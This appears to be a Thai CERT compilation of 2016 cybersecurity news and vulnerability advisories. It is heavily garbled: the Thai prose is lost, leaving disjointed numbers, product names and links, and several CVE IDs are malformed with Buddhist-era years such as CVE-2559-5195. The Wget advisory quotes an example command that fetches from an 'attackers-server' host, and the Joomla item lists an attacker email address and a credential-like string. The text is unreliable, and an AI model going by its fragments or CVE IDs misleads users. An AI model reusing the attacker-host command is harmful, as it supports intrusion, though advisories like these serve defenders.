: Gizmodo <http://thcert.co/uX5Q1a>
358
FBI 2.3
2
FBI

2556
2559 17,000
Botnet
2.3
Mimecast

67% 2556
: 11/04/2559
: Softpedia <http://thcert.co/HGwQiQ>
CYBER THREATS 359
2016
Apple iOS 80
Touch ID 89%
Apple Apple
iOS
80
iPhone/iPad 89%
Touch ID
Apple Touch
ID

: 25/04/2559
: Apple Insider <http://thcert.co/r3mPCl>
360
Kaspersky
DDoS 2559
Kasperky
DDoS 10
1 2559 (Kaspersky
DDoS Intelligent Report Q1 2016) 3

3 Syn DDoS
TCP DDoS HTTP DDoS
8

DDoS
: 03/05/2559
: Secure List <http://thcert.co/KpFAJc>
CYBER THREATS 361
2016
PandaLabs 2559
227,000
PandaLabs
Panda Antivirus

2559 Panda
227,000 (http://www.pandasecurity.com/
mediacenter/src/uploads/2016/05/
Pandalabs-2016-T1-EN-LR.pdf)

IoT (Internet of Things)
: 10/05/2559
: Panda Security <http://thcert.co/yRWvz7>
362

Mail.ru, Google, Yahoo, Microsoft
272 https://
Google haveibeenpwned.com/
Mail.ru
98%

Mail.ru
15%

2

,
SMS

Google,

Yahoo Microsoft

: 12/05/2559
: Hold Security <http://thcert.co/it45s9>,
Mail.ru <http://thcert.co/iwn8ID>,
TroyHunt <http://thcert.co/YAjuVu>
CYBER THREATS 363
2016
Windows 1 4 Internet Explorer

Flash Java
Duo Security Explorer, Adobe Flash Java
Windows 1 4
Internet Explorer
Microsoft
Chrome Firefox
Chrome 82%
Firefox
66%
Adobe
Flash Java 60%
72%

Internet
: 12/05/2559
: Info Security <http://thcert.co/NiNXdX>
364
Ransomware
90,000
Flashpoint
Deep & 7,500
Dark Web (
Tor) 10-15 600

Ransomware Ransomware
30 300
Ransomware
Ransomware

Ransomware
( Ransomware-as-a-
Service)

: 03/06/2559
: Flashpoint <http://thcert.co/J0HZxN>
CYBER THREATS 365
2016
Ransomware 2559
10 2558
Ransomware

2-3
FBI

FBI

2559

209 10
2558
25
: 07/06/2559
: LA Times <http://thcert.co/X2Ns7B>
366
Ponemon Institute

2558 2557
64%

(Data breach)

(Incident Response)
100
3.23
100
70% 4.38

: 17/06/2559
: Help Net Security <http://thcert.co/ylhkdY>
CYBER THREATS 367
2016
58 59 2.3
Kaspersky
(ran-
somware) 2558 2558-2559
2559 2557 2,315,931
2558 2557-2558 17.7% ( 2557-2558
1,967,784 )
Android

2557-2559 Android 2559
136,532
4 2557-2558
35,413

718,536
(
) 5.5
2557-2558

: 30/06/2559
: Softpedia <http://thcert.co/zK6IsC>,
Kaspersky <http://thcert.co/TEIVpT>
368
Blancco

200
eBay Craigslist

67%

11%
36%

: 30/06/2559
: Blanco <http://thcert.co/X0f6M4>
CYBER THREATS 369
2016

10
Big Brother Watch

Investigatory Powers
(

10 )
2,315
2554-2558
800

800

: 07/07/2559
: Big Brother Watch <http://thcert.co/VTOcBp>
370

LightCyber
2016 Cyber Weapons Report

50,000

99%

Angry IP
Scanner, Nmap, TeamViewer, WinVNC,
Radmin, WinSCP

LightCyber (http://
lightcyber.com/cyber-weapons-re-
port-network-traffic-analytics-re-
veals-attacker-tools)

: 12/07/2559
: Threatpost <http://thcert.co/vz8ok4>
CYBER THREATS 371
2016
DDoS 2559
124,000 579 Gbps
Arbor Networks 6
DDoS DNS
2559

Armada Collective

DDoS

2559 DDoS 100,000
124,000
579
Gbps DDoS

- DNS Amplification DDoS Attack
DDoS 1 Gbps (https://www.thaicert.or.th/papers/
technical/2013/pa2013te002.html)
6 986 Mbps
- NTP Reflection DDoS attack
1.15 Gbps
technical/2014/pa2014te002.html)

Reflection amplification
DNS, NTP, SSPD
: 22/07/2559
: Security Week <http://thcert.co/VecZi4>,
Imperva <http://thcert.co/3swdCG>
372
88%

Solutionary
Q2 2016 Threat Intelligence Report Solutionary
(https://www.solutionary.com/
Security Engineering Research Team threat-intelligence/threat-reports/
(SERT) quarterly-threat-reports/sert-threat-
report-q2-2016/)
2559

88%
6%
4%
: 01/08/2559
: Help Net Security <http://thcert.co/SGLMpL>,
Solutionary <http://thcert.co/F5v7SD>
CYBER THREATS 373
2016
Kaspersky DDoS 2559

Linux Botnet
Kaspersky -
DDoS 2 2559 3
DDoS
- Linux Botnet - DDoS
2559 291 (12.1 )
Windows Botnet
55.5% Linux Botnet - 3
44.5% 2559 SYN DDoS, TCP DDoS
Windows Botnet HTTP DDoS
29.7% Linux Botnet

70.2%

- 2558
LizardStresser
Botnet
DDoS Lizard
Squad DDoS
2559
-
(Internet of Things)

: 03/08/2559
: Kaspersky <http://thcert.co/JCy7ln>
374

Healthcare Information
and Management Systems Society
(HIMSS)

32%
52%

10%

: 24/08/2559
: IT World <http://thcert.co/WeOP5Q>
CYBER THREATS 375
2016
21
SentinelOne
2558 Bournemouth UCL

21

71

23

: 29/08/2559
: MetaCompliance <http://thcert.co/wSb7dl>
376
2559
200%
Quick Heal
-

2 2559

- (adware)
-

-
-
(Internet
of Things)
2559
200%
-
(ransomware-as-a-service) Quick Heal (http://
dlupdate.quickheal.com/documents/
others/Quick_Heal_Threat_Report_
Q2_2016.pdf)

: 08/09/2559
: Help Net Security <http://thcert.co/gTzC7y>,
Quick Heal <http://thcert.co/7rizDV>
CYBER THREATS 377
2016
1 5

Trend Micro 300

24 57%

2559 -
25,000
- 44%
24
1 Trend
27% Micro (http://www.trendmicro.co.uk/
newsroom/pr/uk-businesses-bullish-
- about-ransomware-but-majority-pay-
74% up-when-attacked/)
65%
- 1 5

-
33%
31%
- 89%
: 09/09/2559
: Infosecurity Magazine <http://thcert.co/O3oiuc>,
Trend Micro <http://thcert.co/1oBd5U>
378
Blancco

- 30%

Blancco
-

14%
400
11%

10%

9%

- 50%

31%
( NIST
( Recycle Bin) 22%
Special Publication 800-88)

2

- 33% (https://www.thaicert.or.th/papers/
: 23/09/2559
: Blancco <http://thcert.co/gk4FUQ>
CYBER THREATS 379
2016
40%
Word
CyberArk CyberArk

750

- 40%

Word Excel 28%

- 95%

45%
- 68%

57%
cloud
: 26/09/2559
: eSecurity Planet <http://thcert.co/jRXuRB>,
CyberArk <http://thcert.co/qvOpDH>
380
Sucuri 2559
WordPress Joomla!
Sucuri 3
RevSlider, TimThumb
2559 GravityForms
WordPress
Joomla! Sucuri
52% Google
Safe Browsing
blacklist
21,821
WordPress 48%
15,769 backdoor
Norton Safeweb 38%
Joomla! 3,099 McAfee SiteAdvisor
11%

CMS
75% CMS

backdoor

Sucuri
WordPress
22%

: 27/09/2559
: Security Affairs <http://thcert.co/UtJpdH>,
Sucuri <http://thcert.co/5SokNN>
CYBER THREATS 381
2016
DDoS
1
Neustar - 53%
information
security 1,000 DDoS ( DDoS
)
DDoS
DDoS
- 73%
DDoS
DDoS
- DDoS 1.1 Tbps
85% 1 2559
- 49%
DDoS
1 (
350,000 )
- 76%
DDoS 47%
Cloud 37%
DDoS
: 06/10/2559
: Neustar <http://thcert.co/pKg62L>,
Help Net Security <http://thcert.co/LhL7I7>
382

1 10

97%
86%
77%
Trend Micro (disaster recovery
plan) 33%

11%

20%
82%

33%
24%
14%

: 07/10/2559
: Betanews <http://thcert.co/4Xs5BA>
CYBER THREATS 383
2016
Android
1 Play Store
Cheetah Mobile Android

Android 1 3

SMS

1

Clean
Master

: 19/10/2559
: Security Week <http://thcert.co/1zcENd>,
Cheetah Mobile <http://thcert.co/egcgnt>
384
89%
Wi-Fi
Xirrus Wi-Fi Wi-Fi

2,000
Wi-Fi

- 31% Wi-Fi
Wi-Fi
- 89% Wi-Fi

Wi-Fi
- 43% Wi-Fi VPN
42%

- 47% VPN
Wi-Fi
: 25/10/2559
: Help Net Security <http://thcert.co/r92CP1>
CYBER THREATS 385
2016
NTT Security 3
2559
NTT Security -
17%
3 2559 (SERT Quarterly Threat
Report Q3 2016)
Security Engineering Research -
Team (SERT)

-

23% (19%)
(18%)
(12%)
(11%) - Netis
(Netcore)
- 43% 2558
Fortinet
SQL injection

-
48

-

73%
: 27/10/2559
: Help Net Security <http://thcert.co/askwO2>
386
15%
20% Telnet
ESET Telnet
12,000

15%
admin

40%

20%
: 28/10/2559
: We Live Security <http://thcert.co/m9Nqwv>
CYBER THREATS 387
2016
SecurityScorecard -
7 63%

2559 (2016 Healthcare
Industry Cybersecurity Report)

700

21st
- Century Oncology
2.2
9 18 Hollywood
5 Presbyterian Medical Center
17,000
6
- 75%
1

90%
: 04/11/2559
: SecurityScorecard <http://thcert.co/Fb0df5>,
PR Newswire <http://thcert.co/gNyJLW>
388
77%
95%
Barkly
60
1
77%
95%
52%

1 3

Barkly
81%

50%

: 15/11/2559
: eSecurity Planet <http://thcert.co/uumJPn>,
Barkly <http://thcert.co/2eo727>
CYBER THREATS 389
2016
Akamai
3 2559 IoT
Akamai CDN 2
cloud computing NTP reflection

3 2559 DDoS

2559 DDoS
IoT Mirai
3 2558

- DDoS
71%
- layer 3 4
77%
-
100 Gbps 138%
- SQL injection
21%
- DDoS UDP
fragment DNS reflection
: 17/11/2559
: Help Net Security <http://thcert.co/JimGCJ>,
Akamai <http://thcert.co/zqIdHz>
390
66%

Ponemon - 2
2016 Cyber Resilient Organization 74%
64%

2,400 - 70%
2558

-

4

( 142 )
-
4 ( 14
(66%) )
3 4

-
3

- 32%

: 24/11/2559
: Resilient Systems <http://thcert.co/y27G6Z>,
Tripwire <http://thcert.co/4ZjHaG>
CYBER THREATS 391
2016
Flash Player,
Internet Explorer Windows
Recorded Future

(exploit kit) Adobe Flash
Player Microsoft
(Internet Explorer, Silverlight
Windows)

Flash Player Internet
2558 2559 Explorer
10
Flash Player
6
Internet Explorer
(CVE-2559-0189)
2559
: 07/12/2559
: Security Affairs <http://thcert.co/UDMn8c>
392
UK 90%
Windows XP
2

(NHS)
90% Windows
XP
15 Microsoft

2557 (
papers/general/2014/pa2014ge001.
html)

14%
2559 29%
2560

: 09/12/2559
: The Register <http://thcert.co/a6ZHAI>
CYBER THREATS 393
2016
1 5
(

)

Keepsafe
1,000

20%

- 66%
- 50%
: 15/12/2559
: Help Net Security <http://thcert.co/ACIraw>
394
Vulnerability & Patch

CYBER THREATS 395
2016
Google 2559
Android Nexus
4 2559 (Critical) 5
Google (High) 2
Android (Moderate) 5

Mediaserver
Android

Google
Over-The-Air OTA
Nexus

Android Open Source Project
AOSP
Google Nexus

7 2558

Android
Android

12
: 07/01/2559
: Android <http://thcert.co/gUxcV0>
396
VMware privilege
escalation Shared Folder
VMware
privilege escalation Shared Folder VMware
ESXi, Fusion, Player
Workstation
Shared Folder
guest (
CVE-2015-6933)
VMWare
guest
host
: 08/01/2559
: The Register <http://thcert.co/aaLqpu>
CYBER THREATS 397
2016
OpenSSH
Private Key
14 2558 OpenSSH 1. UseRoaming no
OpenSSH global ssh_config(5)
Client Private
Key 2. UseRoaming no
~/.ssh/config user configura-
Roaming tion
Session
3. option -oUseRoam-
ing=no command line

5.4-7.1 OpenSSH 7.1
7.1p2

3
: 22/01/2559
: The Register <http://thcert.co/wrFzmJ>
398
Debian
8 2559
Debian
19 Debian
,
(Denial of Service)

(Previlege escalation)
Debian
(3.2.73-2+deb7u3
Wheezy 3.16.7-ckt20-1+deb8u4
Jessie)
: 08/03/2559
: Debian <http://thcert.co/a6EjqE>
CYBER THREATS 399
2016
Microsoft,
Adobe, Google, Mozilla Apple .. 59
2559 Microsoft, Remote Code
Adobe, Google, Mozilla Apple Execution
(Remote Code Execution)

Microsoft
39 Windows
Internet Explorer,
Microsoft Edge
Remote Code Execution
5
Adobe Read-
er 11.0.15, Acrobat 15.010.20060
Adobe Flash Player (21.0.0.182
Winows, OS X 11.2.202.577
Linux ), Firefox 45, Chrome
49.0.2623.87 Apple Software
Update 2.2
: 14/03/2559
: Microsoft <http://thcert.co/Ya8S76>,
Mozilla <http://thcert.co/ndLb72>,
Apple <http://thcert.co/pAqpDw>
400
Truecaller
Android 100
Cheetah Mobile
Security Research Lab
Truecaller 22

Android Truecaller

Android
100
Truecaller
IMEI

IMEI
Truecaller

: 29/03/2559
: Cheetah Mobile <http://thcert.co/rZghTm>
CYBER THREATS 401
2016
iOS 9 - 9.3.1
Passcode
videosdebarraquito
YouTube Siri 3D
iOS 9 - 9.3.1 (https:// Touch
youtu.be/Jk7GaO_vAW8) iPhone 6S iPhone
iPhone 6S 6S Plus
Passcode Apple
Siri
Twitter Siri
Twitter
3D Touch

: 05/04/2559
: The Next Web <http://thcert.co/cpcSnN>
402
Cisco

6 2559 Cisco
8 (Remote Code Executiion)
Prime Infrastructure,
Evolved Programmable Network (Denial of Service)
Manager, TelePresence Server, UCS
Invicta
: 07/04/2559
: Cisco <http://thcert.co/O24Wce>
CYBER THREATS 403
2016
8 2559 Adobe
Adobe Adobe Flash CVE-2559-
Player 24 1019
(Adobe Flash
Player 21.0.0.213 Windows
OS X, Adobe Flash Player 11.2.202.616
Linux)
: 08/04/2559
: Adobe <http://thcert.co/pusNYl>
404
Samsung Galaxy
. SMS
.
Roberto Paleari Aristide Fattori SMS
Samsung
Galaxy
USB Samsung Galaxy S6,
Galaxy Note 3, Galaxy S4
. SMS
ADB

Samsung

Samsung modem

USB

Linux
m o d e m

device ( /dev/ttyACM0)
device
: 18/04/2559
: Help Net Security <http://thcert.co/I6Zlew>
CYBER THREATS 405
2016
QuickTime Windows
Apple
Trend Micro QuickTime
QuickTime Windows
Windows

QuickTime
Apple QuickTime
QuickTime Windows

QuickTime
Windows

QuickTime

VLC (
)
QuickTime

Adobe
QuickTime
Adobe
: 20/04/2559
: Trend Micro <http://thcert.co/joqPb8>,
vvZDNet <http://thcert.co/6vii0R>
406
Cisco

20 2559 Cisco
Cisco Wireless LAN Controller
Cisco Wireless LAN (Critical)
Controller, Cisco Adaptive Security Cisco
Appliance Software
5
(Denial of Service)
: 21/04/2559
: Cisco <http://thcert.co/O24Wce>
CYBER THREATS 407
2016
HP Data Protector
18 2558
Hewlett Packard (HP) (
6 HP Data Protector 7.03_108, 8.15 9.06)

4
CVSS 10

(Remote Code Execution),
(Private Key)
SSL

Man-in-the-middle
: 26/04/2559
: HP <http://thcert.co/5p7Iyw>
408
Firefox 46
26 2559
Mozilla (Firefox 46)
Firefox 10
1

(Remote Code
Execution)
: 27/04/2559
: Mozilla <http://thcert.co/CXgEsL>
CYBER THREATS 409
2016
Chrome
28 2559 Google
9 Chrome
(50.0.2661.94)

(Remote Code
Execution)
: 29/04/2559
: Chrome Releases <http://thcert.co/Zx8L6J>
410
ImageMagick

ImageMagick

ImageMagick shell command
Linux
distro Ubuntu
ImageMagick 6.9.3-9

4 2559
ImageMagick 1.

file signature
magic bytes

2. Policy

ImageMagick coders
CVE-2559-3714

ImageMagick

: 04/05/2559
: Openwall <http://thcert.co/mTeIJ3>
CYBER THREATS 411
2016
Apple Xcode 7.3.1

Git
OS X 3 2559
(OS X 10.11 El Capitan) Apple Apple Xcode
Git 7.3.1 Git
Git 2.7.4 2
(2.6.4) OS X 10.11 El Capitan
2 CVE-2016-2324 Git
CVE-2016-2315 Xcode
remote code execution
: 04/05/2016
: Apple <http://thcert.co/4S9V6m>,
rachelbythebay <http://thcert.co/F7yQZs>
412
OpenSSL

OpenSSL
SSL
TLS Open Source CA (Certificate Authorities)

OpenSSL Padding Oracle
Cookie
VPN OpenVPN
SSH AES CBC
OpenSSH (Advanced Encryption Standard Cipher
Algorithm in Cipher Block Chaining)
3 2559
OpenSSL AES-NI (Advanced
OpenSSL 6 Encryption Standard Instruction Set)
2

(Encoder) ASN.1 OpenSSL
(Abstract Syntax Notation One) (1.0.2c, 1.0.1o)
OpenSSL
ASN.1

: 04/05/2559
: OpenSSL <http://thcert.co/n3pIcb>
CYBER THREATS 413
2016

Cisco
Cisco TelePresence
4 2559 Cisco

Cisco TelePresence XML
API
HTTP Request
XML API
Cisco
Cisco FirePOWER
System Software Cisco Adaptive
Security Appliance
(Denial of Service)
: 06/05/2559
: Cisco <http://thcert.co/zQ6GJM>
414
HTTPS

SSL
root CA
SSL Private
root CA key

Kaspersky

2558
30 SSL

Kaspersky
TLS/SSL

Man-in-the-Middle

: 10/05/2559
: The Register <http://thcert.co/WJlxRo>
CYBER THREATS 415
2016
WordPress 4.5.2
6 2559 WordPress
WordPress 4.5.2
2
SOME (Same Origin Method Execution)

Cross-Site
Scripting

: 10/05/2559
: Softpedia <http://thcert.co/Okp6mh>,
WordPress <http://thcert.co/db5t5Y>
416
Microsoft Adobe

10 2559
Microsoft Adobe

(Remote
Code Execution)
Microsoft 16
Windows
Internet Explorer, Microsoft
Edge, Microsoft Office, Microsoft .NET
Framework
Remote Code Execution 7
Adobe
ColdFusion, Acrobat
Adobe Reader
Remote
Code Execution
: 11/05/2559
: Adobe <http://thcert.co/d8iKmm>,
Microsoft <http://thcert.co/Y8CELR>
CYBER THREATS 417
2016
10
2559 Adobe

Flash Player Cerber Locky

(
CVE-2559-4117)
12 Adobe
Flash Player
21.0.0.242 ( Linux
11.2.202.621)

Adobe (https://get.adobe.com/
flashplayer/)
: 13/05/2559
: Softpedia <http://thcert.co/khQfSt>
418
WordPress Jetpack
XSS
27 2559
Sucuri
Jetpack WordPress
WordPress
1
Cross-site
Scripting (XSS)
Sucuri 78%
WordPress 56%

Jetpack
4.0.3

: 31/05/2559
: Sucuri <http://thcert.co/kv9sqE>,
Sucuri <http://thcert.co/XdSfJq>
CYBER THREATS 419
2016
Duo Labs - Dell: Dell Foundation

(Bloatware) Services
HTTPS

- HP: HP Support
Solutions Framework
HTTP

, HP Download
and Install Assistant 8092

()

- Lenovo: Update-
Agent HTTP

Lenovo
Solutions Center

- Acer: Acer Care Center

HTTP

Windows
- Asus: Asus Live Update
HTTP

: 31/05/2559
: Threatpost <http://thcert.co/qxhc2l>,
Duo Labs <http://thcert.co/Mr0xo6>
420
Samsung KNOX Samsung

Galaxy
Tel Aviv 1. KNOX 1.0

Samsung
KNOX (CVE-2559-1919)
Android
Samsung 2. KNOX 1.0
Android VPN
Samsung KNOX (CVE-
2559-1920)

3. KNOX 1.0 2.3
Samsung KNOX KNOX clipboard
Samsung (CVE-2559-3996)
2557 Samsung
Samsung
Samsung KNOX Galaxy
Samsung Galaxy KNOX
3 KNOX

Settings About Devices
KNOX version
: 01/06/2559
: Softpedia <http://thcert.co/PionQx>,
Arxiv <http://thcert.co/2Acjl7>
CYBER THREATS 421
2016
KeePass 2 HTTP

KeePass
2

Auto Update KeePass
Auto Update KeePass
2 HTTP KeePass 2

HTTPS Sourceforge (https://
sourceforge.net/projects/keepass/)
KeePass HTTP (http://
keepass.info/)
KeePass
1.
YouTube (https://www.youtube.
com/watch?v=gOxcQSbpA-Q)
CVE-2559-5119 HTTP
KeePass (2.33)
2. KeePass
Auto Update
KeePass 2
Sourceforge
(http://keepass.
info/integrity.html)

: 02/06/2559
: bogner.sh <http://thcert.co/r0Vhsl>
422
Lenovo Lenovo
Accelerator Application

Duo Labs
(Bloatware) Lenovo Windows 10
( ThinkPad
ThinkStation)
Lenovo Accelerator Application
Lenovo

Lenovo

Lenovo Accelerator
Application

Lenovo Accelerator
Application
Lenovo

: 03/06/2559
: Lenovo <http://thcert.co/u8N5Dq>
CYBER THREATS 423
2016

2556
Wi-Fi

Wi-Fi

Wi-Fi
Wi-Fi

Wi-Fi
: 08/06/2559
: Help Net Security <http://thcert.co/uMSJR7>,
Forbes <http://thcert.co/83UFDv>
424
KeePass
HTTPS

KeePass KeePass

KeePass
Properties
HTTP

KeePass

KeePass

(2.34) HTTPS
: 10/06/2559
: KeePass <http://thcert.co/xjsfZ2>
CYBER THREATS 425
2016
D-Link
Senrio

D-Link (Internet of Things)
DCS 930L Wi-Fi

Wi-Fi

: 10/06/2559
: Threatpost <http://thcert.co/PfguVz>,
Senrio <http://thcert.co/qRALc3>
426
! Samsung Software Updater

Software Updater (SW Update)

Samsung
Windows Samsung
SW Update 2.2.7.24
Blue Frost Samsung
Security
Samsung (http://www.
samsung.com/th/support/swupdate/
support-swupdate-popup.html)

SW Update (Bloatware)

SW Up-
date
: 14/06/2559
: The Register <http://thcert.co/xCOhX9>,
Full Disclosure <http://thcert.co/uxec2v>
CYBER THREATS 427
2016
Adobe Flash Player !

(CVE-2559-4171)
14 2559
Adobe CVE-2559-
4171 Adobe Flash Player Adobe Flash Player
21.0.0.242 Internet Explorer

Windows, Adobe
Macintosh, Linux Chrome OS 16
2559
Adobe Flash Player

Adobe Flash Player
Kaspersky (https://www.
ScarCruft thaicert.or.th/papers/general/2015/
pa2015ge003.html)
: 15/06/2559
: Ars Technica <http://thcert.co/tGlG5W>,
Adobe <http://thcert.co/rlPxWD>
428
Symantec
Norton
Google Project Zero
Symantec
Symantec Norton
Symantec

Google

Advanced Threat
Protection (ATP), Symantec Endpoint
Protection (SEP), Norton AntiVirus,
Norton Internet Security, Norton 360

Symantec (https://www.
symantec.com/security_response/
securityupdates/detail.jsp?fid=se-
curity_advisory&pvid=security_ad-
visory&year=&suid=20160628_00)
: 29/06/2559
: Ars Technica <http://thcert.co/NWyEnC>,
Google Project Zero <http://thcert.co/vn0KYh>
CYBER THREATS 429
2016
Foxit Reader 8.0
27 2559 Foxit Reader

Foxit Reader
PDF 8.0 https://www.foxitsoftware.
12 com


Foxit
Reader 400
: 01/07/2559
: The Register <http://thcert.co/pFeNpu>
430
LibreOffice
RTF
Cisco Talos CVE-2559-4324
LibreOffice LibreOffice 5.1.4
5.2.0 LibreOffice

RTF

.rtf

: 01/07/2559
: Security Week <http://thcert.co/vDVo5E>,
Cisco Talos <http://thcert.co/iGQrdv>
CYBER THREATS 431
2016
Wget 1.18
redirect
GNU Wget

Unix/Linux
SecuriTeam
Wget 1.17 Wget
redirect
.wgetrc
( CVE-2559-
4971) Proxy

Wget
Wget
URL (
Cron Job)
wget http://attackers-server/
safe_file.txt
Wget
-O
safe_file.txt http://attack-
ers-server
HTTP
30X redirect URL GNU Wget
Wget 1.18
URL

Wget GNU (https://lists.gnu.
redirect org/archive/html/info-gnu/2559-06/
(Configuration file) msg00004.html)
.bash_profile .wgetrc
: 05/07/2559
: SecuriTeam <http://thcert.co/0qfdpj>
432
ThinkPwn BIOS
Lenovo, HP Gigabyte

ThinkPad
Lenovo System
Management Mode (SMM) BIOS Lenovo, HP
Gigabyte

HP
Pavilion

Gigabyte Z68-UD3H, Z77X-
UD5H, Z87MX-D3H, Z97-D3H

BIOS
: 06/07/2559
: NDTV <http://thcert.co/FGMy4Q>,
The Register <http://thcert.co/imtjEU>
CYBER THREATS 433
2016
Microsoft
(CVE-2559-3238)
12 2559 Microsoft https://

Microsoft msdn.microsoft.com/en-us/library/
cc251294.aspx)

Vectra
CVE-2559-3238 Windows

Microsoft
Web Point-and-Print Protocol
(MS-WPRN)

Microsoft
3170455

(

: 13/07/2559
: Threatpost <http://thcert.co/oZGPK4>,
Vectra <http://thcert.co/BLvTQ0>
434
iOS Mac OS X
MMS, ,
Cisco Talos Apple

iOS, Mac
OS X, watchOS tvOS (iOS 9.3.3,
ImageIO Mac OS X 10.11.6, tvOS 9.2.2
watchOS 2.2.2)

MMS,
iMessage

: 21/07/2559
: We Live Security <http://thcert.co/MtLrdl>,
Cisco Talos <http://thcert.co/RbawgP>
CYBER THREATS 435
2016
Internet Explorer Edge

Microsoft Account
Internet
Internet Explorer Edge
Explorer Edge
Windows SMB
Microsoft Account file://

SMB network share
Windows IP
src
SMB file://

Windows
Windows 10 (
( 2559)
) Hash
Windows 8 Internet Explorer Edge
Microsoft Account Windows Microsoft
Hash Account
Hash

Microsoft Account
NTLM Firewall
SMB IP

: 04/08/2559
: Medium/@ValdikSS <http://thcert.co/zsoyLG>,
Perfect Privacy <http://thcert.co/YKlLk9>
436
Quadrooter Qualcomm
Snapdragon Android root
Google
Check Point
Qualcomm Android Android
/
2559
3 1
Android Qualcomm (
Snapdragon) root 2559

Android

(Permission)

4 Qualcomm
: 08/08/2559
: ZDNet <http://thcert.co/Mm4zHC>,
EF CON 24 <http://thcert.co/Cb2GAW>
CYBER THREATS 437
2016
! Cisco
Equation Group
Equation Group

NSA Cisco

Cisco
15 2559 8.4(3)
Shadow Brokers
Equation Group
ExtraBacon
CVE-2559-6366
Cisco
SNMP
SNMP

17 2559 Cisco
Cisco

EpicBanana SNMP
CVE-2559-6367 Community String
Cisco

DoS (Denial of Service)
: 17/08/2559
: Cisco <http://thcert.co/wJ5itf>
438
Apple OS X

Apple OS X OS X
Yosemite 10.10.5 OS X El Capitan
10.11.6 CVE-2559-4655,
CVE-2559-4656, CVE-2559-4657
Webkit Kernel

3
iOS Pegasus
Apple iOS 9.3.5
3
2559
: 02/09/2559
: VultureBeat <http://thcert.co/RrVLqz>
CYBER THREATS 439
2016
Cisco WebEx
Meetings Server
Cisco 2
2559
2 Cisco
WebEx Meetings Server 2.6

CVE-2559-1482

(Remote Code
Execution) CVE-2559-1483
(Denial
of Service)
: 16/09/2559
: The Register <http://thcert.co/N9G7mV>,
US-CERT <http://thcert.co/qrlmLE>
440

Drupal
SANS Internet Storm Center

Drupal 7.x
RESTful Web Services Drupal

2559 (https://www.drupal.org/
node/2765567)

Drupal

: 16/09/2559
: Softpedia <http://thcert.co/N7a1uF>,
SANS Internet Storm Center <http://thcert.co/eLoXa6>
CYBER THREATS 441
2016
Cisco 850,000
0-day BENINGCERTAIN
2559 Shadow Server

Shadow Brokers
Equation 25
Group 2559 Cisco
850,803
250,000

BENINGCERTAIN
Cisco

BENIGNCERTAIN
CVE-2559-6415 Cisco
intrusion detection system
Internet Key Exchange
version 1 (IKEv1)
Cisco Cisco IOS,
Cisco IOS XE Cisco IOS XR

: 26/09/2559
: Softpedia <http://thcert.co/q0qU4i>,
Shadow Server <http://thcert.co/tnWJsu>,
Cisco <http://thcert.co/EoA6gw>
442
Samsung Knox

Viral Security Group Samsung
Samsung Knox
2559
Android Samsung

Galaxy S6
Galaxy Note 5

KNOXout
CVE-2559-6584
CVE-2015-1805
(iovyroot)
Real-time Kernel Protection (RKP)
Knox root
: 04/10/2559
: Wired <http://thcert.co/zzpG2b>,
Viral Security Group <http://thcert.co/KFAMue>
CYBER THREATS 443
2016
Rapid 7

Animas OneTouch
Ping
900
3 MHz

90
1-2

-

-

: 05/10/2559
: Softpedia <http://thcert.co/NRihM9>,
Rapid 7 <http://thcert.co/JmF859>
444
Avtech
130,000
Search-Lab
http://
Avtech (http:// www.search-lab.hu/media/vulnera-
www.avtech.com.tw/) bility_matrix.txt

- Shodan
CSRF

Avtech 130,000

- (https://www.shodan.
plaintext io/search?query=avtech)

- DVR

- Bypass captcha
login=quick Avtech

CYBER THREATS 445
2016
Avtech
: 12/10/2559
: The Register <http://thcert.co/RcFAlP>,
SecLists <http://thcert.co/I2zsaM>
446
Pork Explosion Android

Jon Sawyer
( Justin Case backdoor
jcase) Foxconn
Android
Pork Explosion bootloader
bootloader Foxconn reboot-ftm
Factory Test
Mode
Factory Test Mode InFocus M810 Nextbit
Robin
SELinux
adb
2

Foxconn

brute force

: 13/10/2559
: Android Police <http://thcert.co/qlZMlv>,
BBQ and 0days <http://thcert.co/ldcjwV>
CYBER THREATS 447
2016
Akami SSHowDowN OpenSSH

IoT DDoS
Akami CDN SSH IoT (

SSHowDowN
DDoS brute force )
IoT
proxy
IoT CVE-2004-1653
OpenSSH
2548 Akami
IoT
SSH (
SSH
AllowTcpForwarding No)
CVE-2004-1653 SSH
IP
AllowTcpForwarding
OpenSSH
port bounce (
http://www.
semicomplete.com/articles/ssh-se-
curity/)
Telnet
: 13/10/2559
: Akami <http://thcert.co/TbzDy5>,
Softpedia <http://thcert.co/oYnDUS>
448
Nine Android

Nine Android Fi access point

9Folders Inc. )
Microsoft man-in-the-middle
Exchange Microsoft Exchange
( base64)

1
2559 Nine
Rapid7 3.1.0
Nine
Microsoft
Nine Exchange

( Wi-Fi Wi-
: 17/10/2559
: Threatpost <http://thcert.co/YS6xso>,
Rapid7 <http://thcert.co/iHAQb6>
Nine <http://thcert.co/YHp75z>
CYBER THREATS 449
2016
Netis,
D-Link, Asus 3
Fortinet s3cur1ty.de/m1adv2013-017)
2

1 30 2559 Asus

3 Netis (Netcore), infosvr UDP 9999
D-Link Asus

Netis 2557 (
(Netcore) backdoor https://github.com/jduck/
UDP 53413 asus-cmd)
9

Fortinet

2557 ( http://
blog.trendmicro.com/trendlabs-secu-
rity-intelligence/netis-routers-leave-
wide-open-backdoor/)
1.75

D-Link
command.php
2556 ( http://www.
: 20/10/2559
: Fortinet <http://thcert.co/MCoTXF>
450
Dirty COW Linux

(CVE-2559-5195) root
Linux kernel
kernel 2.6.22 (
Linux 2550)
root
Dirty
COW CVE-2559-5195 21 2559
Linux Red Hat, Debian
Ubuntu

race condition copy-on-write
(COW)
http://dirtycow.ninja/

root
setuid
root
: 21/10/2559
: The Register <http://thcert.co/87TWRo>,
Graham Cluley <http://thcert.co/fwjqUK>
CYBER THREATS 451
2016
Joomla! 3.6.4
25 2559
Joomla! Joomla! 3.4.4 3.6.3
Joomla! 3.6.4
2

Joomla!
3.6.4
CVE-2559-8869

CVE-2559-8870
: 26/10/2559
: Joomla! <http://thcert.co/mLzetj>,
Softpedia <http://thcert.co/WTlsCQ>
452
Adobe
Flash Player
26 2559 Adobe
Adobe
CVE-2559-7855
Adobe Flash Player Adobe
Flash Player
(23.0.0.205
Windows macOS, 11.2.202.643
(Remote Code Execution) Linux)

- Adobe Flash Player
23.0.0.185 Adobe Flash
Windows macOS Player
(https://www.
- Adobe Flash Player thaicert.or.th/papers/general/2015/
11.2.202.637 pa2015ge003.html)
Linux
: 27/10/2559
: Adobe <http://thcert.co/EugmN8>,
Dark Reading <http://thcert.co/pkGgLs>
CYBER THREATS 453
2016
Joomla!
3.6.4 25,000
Joomla! db_cfg
3.6.4 fsugmze3
25 2559
ringcoslio1981@gmail.com

/index.php/component/
